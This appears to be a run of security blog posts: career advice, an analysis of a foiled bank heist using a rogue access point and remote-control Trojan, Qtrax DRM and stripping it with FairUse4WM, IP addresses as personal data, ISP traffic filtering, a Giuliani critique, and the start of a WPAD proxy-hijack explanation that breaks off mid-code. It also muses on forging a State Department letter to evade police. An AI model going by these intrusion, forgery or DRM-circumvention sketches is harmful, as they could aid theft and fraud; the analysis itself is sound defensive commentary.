Don Parker at SecurityFocus has an article called Skills for the Future about how to get a job in information security. He outlines one path, and while I don’t deny it’s a good one, and probably the most common, it’s not the only way, either.

There are quite a few different areas of specialization within information security. The one people most often think of is the network security specialist — someone familiar with configuring firewalls, network intrusion detection systems, routers, and distributed defense mechanisms like anti-virus and patch management. These people are primarily charged with securing the perimeter.

However, there are others. I’ve made my career mostly in application security — studying how to develop software to be secure, so that even if perimeter defenses fail and an attacker can interact with an application, they’re unable to take control of it. This requires different skills than the network security path — specifically, it’s important to know several programming languages, have a background in software engineering, and be familiar with how application exploits are constructed (stack buffer overflows, heap overflows, pointer arithmetic issues, command injection, cross-site scripting, etc.) and the various defenses that exist against them (both coding techniques and tools like DEP/NX, GS, ASLR, SAL, etc.)

Other specializations in security include compliance auditing and penetration testing. Compliance auditing is less technical, and involves ensuring that internal controls match up with various regulatory and industry requirements, but often those requirements are security-focused. With recent regulations like SOX and industry standards like PCI DSS, there’s an amazing amount of demand for compliance auditors. Penetration testing is often seen as the most “glamorous” of information security jobs, as it essentially amounts to being hired by companies to hack into them. It requires a very broad array of security knowledge, since the best way into a system is wherever the system is weakest — sometimes this will be network security, other times application security, and other times the people operating and configuring the system. Thus, flexibility is key. However, due to the “mystique” of penetration testing, there are more people who want to be pentesters than are qualified for the job, and more people qualified for it than there is demand for it, so it’s not a very good entry point for the security industry.

There is one thing that is important to success in the information security industry — what I call the “security mindset.” You have to be the sort of person who, when you look at a system, thinks about what’s wrong with it. In my experience, some people have just always thought this way, and some people never do. For example, in The Art of the Steal, Frank Abagnale mentions a man who happened to share a name with a notorious drug dealer. As a result, he had to carry a letter from the Department of State to show to airport security whenever he tried to fly internationally, as his name would come up on every imaginable no-fly list as someone to be detained. What do you think of when you hear this story?

For me, the immediate thought was, “Oh, so if I were wanted by police and needed to flee the country, I could just forge a letter from the Department of State saying that I was not really the wanted criminal who happened to share my name. It’d be easy enough to find out the name of some undersecretary in the State Department and get a copy of their signature. If you wanted to be really authentic, you could also buy a phone and give it to a friend who would impersonate the State Department for you, preferably one with a fax machine in case they ask for any corroborating documentation. Of course, you’d best use a prepaid cell phone so your friend doesn’t get caught, either.” It’s just how security people think — we look at a system or a countermeasure, and see how it goes wrong, and what bad assumptions the system makes. This is important because the attackers think the same way — if we can think of a weakness, they can, too, so it’s important to shore up those weaknesses. Software testers often have the same mindset — it helps them find bugs, by finding the things developers didn’t think of.

So, if you want to get into security, and you aren’t right now, what do you do? There are a few preparatory steps:

• Get at least a year or two of real-world experience in a related field — network engineering, software development, systems administration, IT consulting. You can’t get by with security knowledge alone — you have to know how to secure something.
• Get a CISSP certification. The CISSP is a great breadth-oriented certification — it shows that you know at least the basics about all aspects of security, and have knowledge outside a narrow domain. It does have an experience requirement — three years of work in one of the 10 CBK domains — but the domains cover practically everything in the IT industry, so as long as you’re not fresh out of school you can likely meet it. The CISSP exam isn’t so easy you could pass it with no experience, but it’s not very difficult, either. You’ll also learn a lot studying for it — no matter what your specialization is, it will cover areas you know nothing about (cryptography, physical security & life safety, and disaster recovery are new to a lot of prospective CISSPs.)

After that? If you really want an information security job, you really have to focus in that direction. Once you have a couple of years of experience in a related field, don’t keep taking jobs in that field — look for security jobs. If you’re not in a major metropolitan area, this can be difficult. However, I know from experience that I spent far too much time in general development jobs with a little bit of security exposure when what I wanted to do was full-time security work. I would try to get security-related assignments, doing security testing and fixing security bugs, but there’s only so much security experience you can get when it’s not your main focus, and prospective employers know this. What launched my security career was being willing to jump into an IT security job even when it was in a less desirable area for me (network & infrastructure, when my specialization was development) and involved a substantial pay cut. What that first job is doesn’t matter that much — once you’re there, you’ve gone from a person who wants to be in information security to being an “IT security professional.” It’s easier to move around to the job you want once you have a foot in the door. Remember, in the modern technology industry people often don’t stay in a job for more than 12-18 months; it’s not a lifetime commitment to take a less-than-ideal job.

Many people ask about certifications and their importance to a security career. I would say that the CISSP is vital — many employers use it as a quick check of if you’re a “real” security person. However, beyond that, there are many things that can be useful, but that experience can substitute for. I do see some value to the following:

• ISACA’s CISA certification. This is highly valued if a.) you want to go into compliance auditing, or b.) you want to work for a large consultancy. If you want to do internal, very technical security work for a corporation, it’s not important.
• Microsoft’s MCITP certifications (or their predecessor, the MCSE.) It’s a nice thing to have on your resume, showing you know a lot about Windows environments, which make up most of the corporate world. Unfortunately, these certifications are extremely test-focused. On the plus side, it means that you can pass them with no experience, just studying for the test. However, it also means that even if you have a ton of experience, you still have to study a lot for the test, as they cover a great deal of material that is rarely used in the real world (e.g. unattended deployment scripts for servers) that you’ll just have to memorize. There is a problem of “paper MCSEs” who have passed the test but know very little, which has devalued the certification in industry, but it’s still useful.
• For application security specialists, having something to show your development experience is good. Microsoft’s MCPD certification or Sun’s SCJP certification can do this. Your first job in application security isn’t going to be reviewing kernel architectures — most of the world’s applications are managed code, either .NET or Java. Thus, these are a good place to start.

I think that the technical certifications are very helpful for getting initial jobs, especially since they don’t have experience requirements like the CISSP. However, they do have a useful life — once you’re making $100,000 per year or more, no one will ever ask, or care, if you have an MCITP, MCPD, or SCJP. They show technical knowledge if people don’t have any other way to know if you have it — but a long career in IT or development will show technical knowledge even better.

The most important thing is to be good at more than one thing. Security is a broad field by its nature — attackers go for the weakest point in the chain. There’s a larger market for security generalists than specialists in any one area, and even the specialists need to have a general background. If all you can do is firewalls, you’re competing for a smaller pool of jobs than if you can do firewalls, but also UNIX or Windows sysadmin work, or programming.

The AP has a story about an electronic bank robbery foiled when a bank employee pulled the plug on the robbers’ network connection.  Apparently the robbers had gained physical access to the employee’s workstation at some point, and installed “advanced technical equipment” underneath the desk to remotely control the computer.

I would guess that the “advanced technical equipment” consisted of a cheap consumer wireless access point.  The attack probably went something like this:

• Gain unsupervised access to the machine in some way, either by breaking in or by impersonating someone with legitimate physical access (e.g. a cleaning crew.)  Perhaps it’s an inside job and one of them does have legitimate physical access.
• Install a wireless access point behind one of the computers configured as a network bridge, so it can be remotely accessed without setting foot in the bank.
• Bring the computer up offline (using some external boot media so no passwords are required) and install a remote-control Trojan — either some VNC variant or a system designed for use as a surreptitious Trojan like CdC BackOrifice2K.
• Wait until the next day when the user has authenticated but walked away from their computer, take control of it from a van across the street, and begin transferring funds.

As for the somewhat dramatic line “By pulling out the cable to the device, the employee managed to stop the intended transfer at the last second,” this is obviously meant to evoke movie scenes where there’s some progress bar on the screen marked “Transferring funds…” that gets interrupted at 99% by the heroic employee cutting the cable.  However, what’s more likely is that the employee looked at his computer, noticed the mouse moving on its own, clicking buttons to transfer funds and entering in an amount.  Before the button to confirm the transaction could be pressed, the remote control was disconnected so the transfer was never started.

This is an interesting attack in that it doesn’t really fit the profile of a traditional bank robbery, but neither is it a completely electronic theft.  The attackers had to have had physical access to the bank, but they didn’t use it to get at the money — they used it to get to the computers.

Security measures are targeted.  The bank’s physical security consists of cameras watching teller stations and heavy vault walls and doors guarding the money.  This is targeted at stopping two attacks — the vault stops simple burglary (walk in at night and grab the money), while the cameras detect employee fraud by tellers and armed robbery by customers.  Meanwhile, the bank’s electronic security consists of firewalls, intrusion detection systems, and access control systems that stop people from outside the bank from accessing the systems.

This attack went around both.  The physical security was not set to stop people tampering with desktop computers — there’s no money there!  Someone was thus able to either sneak in or social-engineer their way to the desk and tamper with equipment undetected.  The electronic security is not meant to stop someone actually sitting at a computer who has logged in with legitimate credentials — they’re supposed to be able to move money around.  By combining an electronic breach with a physical one, the attackers managed to be “sitting at the computer” while actually nowhere near it.  It’s an ingenious plan, and one of those rare cases where a rather elaborate “heist movie plot” sort of attack was attempted.

They were stopped by one of the most powerful countermeasures available — a vigilant employee.  However, there is a lesson to be learned from this: Physical security is important!  If an attacker has unmonitored physical access to hardware, he can modify it to do anything he wants.  No passwords or credentials are needed if he can reboot the system with a flash drive or CD-ROM.  How many of your company’s electronic countermeasures would be rendered useless by an attacker who could remotely control a computer inside the perimeter, or even just had a network tap to the internal network behind the firewall?  In most companies, it’s not too hard to gain physical access, usually by impersonating a service employee of some kind (janitorial staff, phone company employee, etc.)  Presumably the attackers who had physical access were in a hurry, since they put the AP under the same computer they were controlling; with more time, they could have compromised one computer and hidden the AP somewhere entirely different, making it harder to find and pull the plug.  Of course, if the employee was thinking clearly (and he probably was, since he thought to pull the plug at all), he still could have simply switched the computer off, so this wouldn’t have done a lot of good.

Also, it’s worth periodically searching for rogue access points.  Not only might an attacker install one deliberately, but employees in businesses without wireless networks have been known to install a wireless AP under their desks simply for convenience.  Often, these are configured very poorly, with no security or encryption at all.  Rogue APs can be detected in a variety of ways; if you have the luxury of having access to a product like Aruba Networks’ RFProtect (which was called Network Chemistry last time I used it, but seems to have since been acquired by Aruba,) monitoring can be automatic and continuous.  If not, there are still open-source rogue scanners, and even simple tools like the aircrack-ng suite can be used to look around, though it’s considerably less automatic (and thus more time-consuming) to do it that way.

This also points out the importance of defense in depth.  Host-based firewalls and intrusion detection might detect an attack like this, but traditional perimeter defenses like firewalls and NIDS are useless against it.  Layers of security, designed to interfere with different types of attacks, always provide much more security than any single countermeasure.

On further investigation, it turns out that there is a reason for the DRM protection on Qtrax downloads… it’s just not to prevent piracy.

When a Qtrax-downloaded file is played, the WMA licensing notifies Qtrax of the act — so that they can divvy up advertising revenue from the site based on what people are listening to.  Since the Windows Rights Management system lets them require a bit of netcode to be run when you listen to a song, this works.

However, it still won’t fix the existing problems with DRM — specifically, that non-DRM-enabled players won’t be able to play the files (they claim they’ll be offering iPod-compatible tracks, and worry about Apple blocking them, but there’s no word from them on how they’ll do this, since WMDRM tracks won’t play on iPods) and mobility between machines is difficult.  People will still be motivated to rip the DRM off the tracks (thus breaking Qtrax’s tracking system) for convenience, or to turn to pirate downloads.

My guess is that Qtrax would prefer to pay labels based on downloads, not song plays, but the labels wouldn’t go for it, or just couldn’t stand the very concept of releasing unencumbered tracks for free no matter how much ad money they got.

If this was the way the labels had released music to begin with, I think consumers would have been happy with it.  But now, after the history of DRM, I think the public perception of “bad juju” around anything DRM-encumbered may sink it.  We’ll see, though — legal and free pulls a lot of weight with consumers.

So, there’s been a lot of news about Qtrax, a new music download service approved by the major record labels. It sounds like a good thing for consumers — a Songbird-based browser lets you select pretty much any song imaginable, including the entire catalog of songs available from iTunes, and download it freely and legally. Now, since it’s peer-to-peer, presumably not every song will be available at first, but they’re all licensed, so as soon as anyone makes them available they will be easy to acquire and free to download. (Though I don’t know for certain; it’s possible that Qtrax has its own server that will share out files if there are no other peers that have them.) The system is ad-supported, with Qtrax turning over most of the ad revenue to the labels in exchange for the licenses.

But here’s the weird part — all the downloads are Windows Rights Management-protected WMA files. There’s DRM on them; you are allowed to put them on a mobile device of your choice, but can’t spread them to other computers. This seems faintly ridiculous — they’re free. What does the DRM prevent you from doing? Copying your free files from one of your computers to another rather than having to pay the price of $0 twice? Giving your free files to others, rather than making them download them for free?

What this will really do is show that customers actually mean it when they say they hate DRM not because it prevents them from pirating media but because it’s simply annoying during the way people use their music. For instance, I place all my music files (ripped from my own CDs) on a central server and then can access them from any computer in the house. With these DRM-protected files, I couldn’t do this; I would have to have a copy of the entire music library on every computer in the house, because each would have different DRM codes.

However, this also demonstrates that the record companies don’t understand how DRM works — they’ve set up the ultimate trusted client scenario. When you download a file, free, from Qtrax, you get both the file and the license key for it. Which means you can just run FairUse4WM (an easy-to-use, free utility) on the file and strip the DRM right off. It’s quick, easy, and instantaneous so long as you have the key — which on a Qtrax download, you do. If you give everyone the keys freely, DRM becomes completely ineffective. In fact, with their Songbird-based architecture, I bet you could even write a plugin for Qtrax that would strip the DRM off automatically using FairUse4WM as you downloaded files.

Anyone who actually wants to pirate music will figure this out. The only people who won’t are, of course, the legitimate end users who just want to listen to music on multiple computers and devices. For those users, getting unprotected music will mean turning to the Pirate Bay.

Updated: it turns out that there is a reason for the DRM, it’s just not to prevent piracy.

Peter Scharr, Germany’s Commissioner of Data Protection and head of the European Union’s privacy working group, has stated that information identified only by IP address must be considered personally identifiable information. As the AP article points out, this could have rather serious implications for search engines and many other electronic businesses, and RSnake is concerned about it messing up the entire advertising business model of the Internet.

First, for those not working in the information security industry: something being classified as personally identifiable information (PII) is a big deal. If data is PII, you are liable for damages if the data is ever released, and you are required by statute to take significant and often expensive measures to protect it. If you’re a public corporation, Sarbanes-Oxley requires you to do all sorts of things to protect the data (e.g. encryption.) If your company takes credit card payments, the Payment Card Industry Data Security Standard requires you to do even more (e.g. physical protection of the hardware the data sits on, specific firewall/router configurations, etc.) Most large companies have their own standards for how PII must be protected that combine or even go beyond the regulatory and industry requirements. Overall, the required protections around PII are onerous enough that companies strive to minimize how much PII they have at all — it’s often cheaper and easier to just delete the data than to protect it the way you need to protect it. Companies must make the decision of “How much business value do we get out of storing, say, our customers’ addresses, and does it exceed the cost of protecting that data?” Often the answer is no.

On the surface, calling IP addresses PII is ridiculous. IP addresses are found on every packet anyone sends on the Internet; if IP addresses count as a personal identification, then logging basically anything about Internet traffic makes the logs PII. It takes a label currently applied only to a small amount of high-value data and applies it to something that everyone everywhere logs; it seems absurd. But as I think about it more, I’ve come to realize that Scharr has a point.

The EU is much more aggressive about privacy law than the United States. The United States Constitution guarantees privacy from the government through the Fourth and Fifth amendments; this sharply limits what the government can collect on you and what it can do with the data it does collect. However, there is no Constitutionally or legislatively defined general right to privacy — anyone can collect whatever data they want, so long as they’re not a branch of government. This is usually an adequate protection against government abuse, but it does mean the private sector can accumulate a frightening amount of data about you, and that could be prone to abuse as well. EU nations, on the other hand, often have a general right to privacy and various data collection expected in the United States is often illegal; in addition, where the data can be stored, sharing it with any third party without express user consent is almost always illegal.

If IP addresses are PII, what really happens? It requires changing a lot of current practices, but this is not the same as breaking scenarios. Remember, the privacy issue isn’t with transmitting or using IPs — it’s with storing them or sharing them with a third party.

• Currently search engines like Google use your IP to identify where you are geographically, so as to establish search profiles for regions and target ads. They store the first 24 bits of your IP (dropping the last octet) as a proxy for location. They would need to switch to storing a different proxy for location (e.g. latitude and longitude), though they could still base this proxy on your IP.
• Pay-per-click ad networks would still function. When they’re clicked, the ad network records the click (so as to be able to bill the advertiser), then issues a 301 redirect to the advertiser, who also records the click (to know it happened and the ad was effective.) These records would need to leave out IP, or be protected as PII. Lacking IP, however, would make detecting and preventing click fraud (spoofed clicks, or many clicks from the same person) much more difficult. Currently a skilled fraudster can evade IP-based click-fraud prevention, but losing even that would make click fraud easy. Also, without IP addresses, the ad networks would have a hard time proving to advertisers that clicks were real if an advertiser chose to sue them. Large ad networks would probably have to just eat the cost of protecting their logs as PII.
• Contrary to RSnake’s comment, I do not think this would affect embedded content. Embedded content comes in two forms — content linked to on a page, which your browser loads (objects), and content retrieved by the server and displayed on the page (mashups.)
  • In the object case (e.g. viewing a YouTube video on someone’s web page), the web site owner is not leaking your IP to the third party — you are. The web site is not sending your IP to YouTube at all; your web browser is sending it in response to a link tag in the page.
  • In the mashup case (e.g. web pages that get data from an API, like Facebook pages, pages embedding Google Maps, etc.), the web site owner is also not leaking your IP to the third party. You access the site, and then the site accesses the third party not as you, but as itself. The site leaks its own IP, not the customer’s. No PII is released.
• Sites that do user tracking (via logins simply recognizing users between sessions) would be unaffected; they use cookies, not IP, to track users. Most ad networks work this way, too.
• The biggest change, though, is to simple website logs. Currently every time you access any web page, it makes a note in a log of your IP and which site you accessed, which is used for statistical analysis, forensics, etc. Even this blog is doing it; with most web providers you can’t even turn this logging off if you want to. Sites will either have to stop doing this or take substantial steps to protect the logs (or else be subject to significant statutory liability if they don’t.) Not keeping logs is, from a security perspective, very dangerous — if something happens, you have no idea what happened and thus may not be able to fix it.

However, despite all that cost and difficulty, when you think about it… IP addresses really are personally identifying. If you have an always-on broadband ‘net connection, your IP address changes very rarely (maybe only once in several months), so all your web traffic everywhere, complete with your search queries, emails, etc., can be tied together with that number. Your ISP can connect that number to your name, address, etc. If you’re at a corporation, the IP is tied to a corporate gateway or proxy… which has logs tying each communication (based on date and time) to your desktop’s IP, which once again likely uniquely identifies you (unless you always compute from a shared machine.)

IP is a unique identifier for confirming identity, but not so much for initially finding it. In other words, if someone attacks my website, and I have only their IP address, it may not do me much good in finding out who they are unless I can get someone with subpoena powers to get it from the ISP. However, if I suspect a specific person of something, I can probably find out their IP and check it against my attacker’s IP, thus confirming their identity. Likewise, if I am an ad network or search engine with a lot of IP data, I don’t know who you are based on your IP, but the commonality in IPs between all the data I have may enable me to figure it out based on data aggregation.

I think this is a case where something is considered ridiculous merely because it changes things. Yes, a lot of business models and current practices would have to change if IP-as-PII became the default assumption. Yes, it would make some security people’s jobs harder, and cause web providers to incur a lot of costs. But does that mean it’s wrong? Perhaps what it means is that current businesses & web sites under-value their users’ privacy, and are freeloading while providing inadequate protections. It’s a different world if we have to discard IPs or protect them as PII, but I’m not convinced it’s a worse one.

The recent news from broadband providers seems to be all about how to make their product less appealing to customers.

First of all, the AP reports that AT&T is still considering filtering backbone traffic. They say they’ve noticed the massive amount of copyrighted data being shared over P2P networks, and feel a need to do something about it — “It’s like being in a store and watching someone steal a DVD. Do you act?” However, I think it’s likely that this is not just AT&T having an attack of conscience (not exactly something Ma Bell is known for), but rather AT&T being pressured by the usual suspects, the MPAA and RIAA.

They’re looking at this as a security problem — how do we stop unauthorized traffic (piracy) while allowing authorized traffic? From this perspective, it’s tractable — the technology exists to do it, albeit clumsily (you either miss a lot of piracy or you throw out a lot of legitimate traffic.) However, this is more than a security problem — there are legal and business problems here that in my opinion should overwhelm the security concern.

I’m surprised that AT&T is actually considering it. Currently, AT&T is shielded from lawsuits over content carried over their network by having “common carrier” status — they do not discriminate based on content. If they begin discriminating based on content, they may cut down on music and movie piracy — but they also render themselves vulnerable to being held liable for what music and movie piracy does occur. Perhaps the MPAA and RIAA have offered to indemnify AT&T in exchange for its help with the filtering. There is another problem with filtering, though — AT&T’s Internet backbone lines carry a staggering amount of traffic, so any kind of filtering would of necessity have to be very rudimentary or the processing power requirements would be enormous. Essentially, they would have to do something like what Comcast did with the Sandvine system — just interfere with all BitTorrent (or other P2P) traffic, without making any attempt to differentiate between legal and illegal content.

Perhaps AT&T has another ulterior motive, though — P2P traffic is representing an increasing proportion of all Internet traffic, at this point more than half. If killing P2P would drop AT&T’s bandwidth requirements by 60% while not affecting their revenue, this would have to be tempting for the corporation.

The increasing amount of P2P traffic is causing another major Internet company to consider sabotaging their own business — Time-Warner Cable. Ars Technica reports that Time-Warner is considering switching to metered rates, where users pay different amounts based on how much bandwidth they are using. They’re undoubtedly considering this due to the public’s reaction to Comcast’s filtering of P2P traffic (outrage and lawsuits.) Cable companies are in a bind — they built their networks under the assumption that traffic is extremely asymmetric — many users send small amounts of traffic (requests, acknowledgments) to centralized servers which respond with large amounts of traffic. This made sense when almost all Internet traffic consisted of web pages, but P2P networks destroy this assumption, with each user uploading as much, or more, than they download. Essentially, with P2P everyone is a server, and the cable companies simply can’t handle this without massive, expensive upgrades to their entire infrastructure. Their problem is one of failure to plan — they didn’t see this coming, and spent billions of dollars in capital building the wrong network. Even without piracy, P2P would be an increasing proportion of Internet traffic today — the world has changed, and it won’t be changed back again.

On one hand, metered pricing is fair. Right now, the people who use P2P are getting their Internet connections below-cost — we’re unprofitable for the ISPs, who can only support us because the masses of people who do nothing but occasional web-surfing are so profitable that they subsidize P2P users and result in an overall profit for the ISP. ISPs can afford to offer “unlimited” broadband only so long as they can be sure almost no one will use it. With metered pricing, heavy users pay for their heavy use, and light users can pay less since they don’t have to subsidize the heavy users. On the other hand, there’s a problem — customers despise metered pricing, especially when they’re used to flat-rate. In the 90’s, phone companies experimented with metered local service, and it was outrageously unpopular even with people whose phone bills decreased as a result. Sure, they were paying less, but now they felt limited.

Switching to metered pricing will indeed save money. However, it will do so by driving away customers, starting with the unprofitable heavy users. Perhaps this is intentional — banks set up their fee structures to drive away unprofitable customers, too, so it’s not unprecedented. But in the long run, P2P use is increasing, and the old usage patterns are decreasing — if the networks don’t adapt to this, eventually they’ll have no customers left. Competitors like Verizon FiOS, which (due to a fiber-optic last mile) don’t need to limit upstream bandwidth and have been built in the modern P2P world will kill off any network that tries to live in the past.

Today I found a link to an article by my least-favorite current presidential candidate, Rudy Giuliani. I was expecting a cavalcade of fear-mongering — his usual stock in trade — but discovered to my surprise an article entitled “The Resilient Society.” This gave me pause, as resilience is precisely what I believe must be the necessary societal response to the distributed threat of terrorism. Security must be divided into prevention, detection, response, and recovery — resilience is the ability to quickly recover from attack at as low a cost as possible. Resilience is the difference between a society changing its entire way of life in response to a terrorist attack vs. society being able to return quickly to normalcy, thus making itself impossible to terrorize. I was not expecting to hear about resilience from Rudy Giuliani — after all, this is the one aspect of national security that cannot be centralized around an all-powerful government (Giuliani’s obvious goal), but rather relies on the distributed strength of every citizen. Was I about to actually agree with an article by Giuliani?

It turns out that I had nothing to worry about. Despite its title, there are only four paragraphs about resilience in the 41-paragraph article, and even those are wrong.

So what does Giuliani think must be done to defend a society from terrorism? Primarily a command-and-control response process combined with offensive attacks on the sources of terrorism.

With regard to prevention, Giuliani favors deployment of massive detection nets to fight against the attacks we’ve already faced — radiation and biohazard detectors at every port and point of entry. The cost-benefit ratio of this would be astronomically poor; as a free society with mostly open borders, there are a phenomenal number of entry points to the United States, and only very rarely (possibly never, so far, though the government would not be likely to tell us if it did happen) does anyone try to smuggle weapons-grade nuclear material or biological weapons through it. This isn’t to say that these measures would do no good, but they protect only against specific attacks and are obvious. They signal to terrorists “you can’t bring a nuclear or biological weapon through a shipping container in a port,” thus letting them know they should instead a.) use conventional weapons, b.) acquire nuclear/biological materials already inside the United States, or c.) enter via uncontrolled border space. If I, in three minutes, can think of three easy ways around a measure that will take billions of dollars to implement, it’s not very cost-effective.

He discusses the difficulties in information sharing between law enforcement and military agencies, clearly seeing these as an unalloyed negative. He’s right that there have been clear communications breakdowns, where these organizations had information that they were legally free to share, but chose not to out of myopia or the desire to preserve the institutional sovereignty of their silo. Despite the Central Intelligence Agency being founded to ensure all military and civilian intelligence agencies share information, it has in many cases become the most isolated hoarder of information of them all, and this is a problem. However, in other cases the obstacles to information-sharing are the civil liberties guaranteed by the Constitution. Giuliani has no issue with sweeping these away — this is, after all, the person who claims “Freedom is about authority. Freedom is about the willingness of every single human being to cede to lawful authority a great deal of discretion about what you do. You have free speech so I can be heard.” (That quote is not taken out of context in any way. He did not, however, go on to add “War is Peace. Freedom is Slavery. Ignorance is Strength.”)

Judicial oversight is not inimical to detecting and stopping international terrorism. Judges do not want terrorist attacks to happen, either; these protections exist to ensure that normal people are able to live their lives without constant monitoring. Surveillance is not unintrusive. Comamnd-and-control executives like Giuliani think that it does not matter if people are being watched, as only the “bad guys” will be prosecuted, but this simply isn’t true. First of all, people change their behavior when they know they’re being watched. It has a chilling effect not just on actually criminal behavior, but also on any behavior that people consider “socially unacceptable.” Surveillance drives everyone toward the mainstream center of society, homogenizing them; it creates the very opposite of a free society. (For a chilling illustration of this, I highly recommend Charles Stross’s sci-fi novel Glasshouse, one of the best and most terrifying books I’ve ever read, though it requires a high tolerance for transhumanist concepts.) Second, who watches the watchers? Even if Giuliani’s motives are pure (they’re not), and he wants to use these tools of warrantless surveillance, imprisonment without trial, etc. only against international terrorists, no one can possibly believe the entire law enforcement apparatus of a 300-million-person nation is entirely free of corruption and petty tyranny. Security has a cost — Giuliani looks only at how these measures benefit security, ignoring their unintended consequences. Security is of limited value — a terrorist attack is tragic but it does not end the world. We must not embrace “security at any cost” — instead we must consider security at a cost that we can bear, and most importantly, not allow the cost of security to exceed the cost of terrorism.

Giuliani also wants a “good Samaritan” law for people who report suspicious activity, protecting them from lawsuits. This is a terrible idea. Lawsuits are there to provide a cost for making a false of frivolous report — people will still report the man walking down the street with a pile of dynamite, but they think twice about reporting possibly-suspicious but almost certainly innocuous activity, like speaking Arabic in an airport, or loitering in a parking lot. Making reporting costless means you’ll get an inevitable excess of it, resulting in both the chilling effect of universal surveillance and a waste of law enforcement’s time. When people are encouraged to report everything unusual, you drown in reports and make people paranoid. This teaches people to react to the unknown with fear — that is, it accomplishes precisely what terrorists aim to accomplish. People reporting suspected terrorist activities should not be immune from lawsuits; rather, courts should decide whether the report was reasonable and take appropriate action. Often the reporters should be held blameless, having had a reasonable reaction that turned out to be incorrect, but doing so automatically makes filing false reports a simple way for private citizens to use the nation’s law enforcement apparatus as a means for private revenge.

Giuliani also calls for “tamper-proof biometric ID cards” for all non-citizens. As a security professional I can’t help but chuckle when anyone uses the word “tamper-proof.” But there’s nothing terribly wrong with this… except that it doesn’t do any good. We already know when people enter the country legally, and we identify them then; if they sneak in, they’re not going to have a “tamper-proof biometric ID card” any more than they have a regular ID card now. In addition, identity alone does not provide security. The fact that you know who someone is does you little to no good if he does not have a background in committing terrorist acts. And if he has a background in committing terrorist acts, why would you hand him a “tamper-proof biometric ID card?” Just deport him!

Giuliani supports fences around borders and stepping up guards, but claims to want to avoid turning the nation into a “fortress” in order to “deepen the connections between America and the Islamic world that will prove essential in prevailing over radical Islamic extremism.” On one hand, he’s on to something there — the only way to truly prevent terrorism is to eliminate the motivation for terrorism. Otherwise, 100% prevention is impossible — total prevention requires that you succeed every time, while the villains only have to succeed once. On the other hand, he simultaneously advocates precisely the foreign policy that creates that motivation — worldwide interventionism and American control and support of often-corrupt foreign governments. Now, the fact that a given policy makes people want to kill you doesn’t necessarily mean that that policy is wrong – but it is a cost of that policy that must be taken into account, and to claim that it will not have this effect is disingenuous.

Stepping up epidemiological surveillance and data gathering is the one good idea Giuliani has. Not only would it be helpful to detect bioterror attacks, but more importantly, it can help detect and contain natural pandemics. The emergence of a serious disease threat at some point in the future is a certainty, and unlike surveillance of people’s activities, this sort of surveillance has very little civil liberties cost.

Giuliani is obvious very proud of New York’s CompStat method of crime detection and prevention, given his desire to apply the same methodology to everything. For terrorism and border control, it makes some sense, as these are essentially law enforcement problems with a lot of parallels. However, for emergency preparedness it does not. Dividing up funding based on “need” determined by a statistical formula is absolutely certain to result in “gaming the system.” Emergency preparedness must be decentralized; there is no way for the Federal government to take care of it on a nationwide basis, or even to effectively coordinate and monitor it. Fundamentally, preparedness requires having appropriate materials on site and appropriate plans made, and no one can make those plans from afar.

Finally, Giuliani gets to the putative subject of the essay, resilience. He says, rightly, “Government should harness the inherent strength of the American people and the private sector in order to build a society that may bend—but not break—if catastrophe does strike.” It is somewhat ironic to hear this from Giuliani, who has just spent the preceding 30 paragraphs calling for increased central control of everything. His entire resilience proposal is as follows:

• Create government-organized response teams of private citizens who have been trained and equipped by government to respond to disaster,
• Pass a law shielding people from lawsuits if they are trying to help in disaster response, and
• Set government standards for how businesses, citizens, and charitable organizations should respond to disasters.

Ah, for every problem a government solution. This is precisely what resilience isn’t. A resilient society is one that responds to and recovers from disaster on its own — one that is not broken by disaster but continues to function mostly unchanged. The model of a resilient society is England during the IRA period: terrorist attacks happened, and life went on largely unchanged.

Western society is still phenomenally resilient, but not as much as it once was. You cannot build a resilient society using only government. A resilient society comes from a variety of factors, and these can do more to protect against the impact of terrorism than any technological or centralized security measure. They include:

• A culture of hope. People have to believe that every terrorist attack is an abberation, and that life will return to normal. This is what prevents a localized disaster from having repercussions on an entire nation for years to come; without this, with a culture of fear instead, the damage of a terrorist attack is multiplied a hundredfold.
• A citizenry that trusts itself. People must believe they are competent to solve their own problems, so the first reaction to a disaster is not “how will I get help,” but rather “what do I need to do?” Government cannot save everyone; if the able-bodied and passably intelligent people save themselves, government is freed up to help those who genuinely need it, and not simply those who abrogated their responsibility to plan.
• A populace that cares for others while still expecting them to take care of themselves. When disasters like Hurricane Katrina or 9/11 occur, there is an outpouring of charity from the populace to help. It doesn’t take government to solicit this; general benevolence will do, the desire to help anyone hurt by a disaster rather than using disaster as am impetus to hoard more for yourself and your tribe. However, people also must recognize the limits of charity, and be willing to go back to their own lives as time passes.

All of these are cultural shifts; we can’t impose them, and as Giuliani is running for head of government, it makes sense for him to talk about government actions. However, the statements he’s making are precisely what damages resilience. When all we hear from government is how they are expecting impending doom, and how government will save us when it happens, it does not teach us to have hope, trust ourselves, and help others! It teaches us to always anticipate disaster, do nothing and wait for help when it happens, and expect the government to do all the helping. Regardless of what the government does, this rhetoric from our politicians itself reduces the resilience of our society.

If you run Internet Explorer, you may have noticed that often when you first load up IE and try to navigate to a web page, there’s a delay of a few seconds longer than there is on subsequent page loads. This is because IE is trying to automatically detect your proxy settings. Inside Internet Options -> Connections -> LAN Settings, you’ll find an option called “Automatically detect settings” which defaults to on. Unless you’ve turned it off manually or are joined to a corporate domain that turns it off, it’s probably still on.

It turns out that this settings is absolutely appalling for security, opening up several opportunities for an enterprising hacker on your local network. On a corporate network, that may be everyone in the building — on a wireless hotspot, it’s anyone in range. To understand the vulnerability, we have to look at how Automatically Detect Settings actually detects your settings.

When IE is first requested to load a page, it attempts to locate a server called WPAD. First, it checks the information received from the DHCP server, looking for site-local option 252, “auto-proxy-config.” Failing this, it tries to do this with a DNS lookup, asking the local DNS server to identify the IP address for WPAD. If this doesn’t work, it proceeds to try to use WINS — the old NetBIOS-based Windows Internet Name Service that is how multiple computers on a home network identify each other in the absence of a DNS server — to identify WPAD. It will try this for each domain extension up the hierarchy — if your computer is called fnord.endor.sparkplug.squid.com, it will look for, in order:

• wpad.endor.sparkplug.squid.com
• wpad.sparkplug.squid.com
• wpad.squid.com

It should not try to load from wpad.com (or wpad.net, etc.), though some configuration errors can cause it to try. In any case, if it finds a server called WPAD, it tries to retrieve proxy data from it, by issuing:

GET /wpad.dat HTTP/1.0

This is called the Web Proxy Auto Discovery Protocol, from which WPAD gets its name. The resulting file wpad.dat must be returned with the MIME type “application/x-ns-proxy-autoconfig”, and contain JavaScript that implements a function called FindProxyForUrl. This function is then called by IE on every URL it tries to load from then on, to determine what proxy servers, if any, it should use. The simplest example of this file could be something like this:

function FindProxyForUrl(url, host)
{
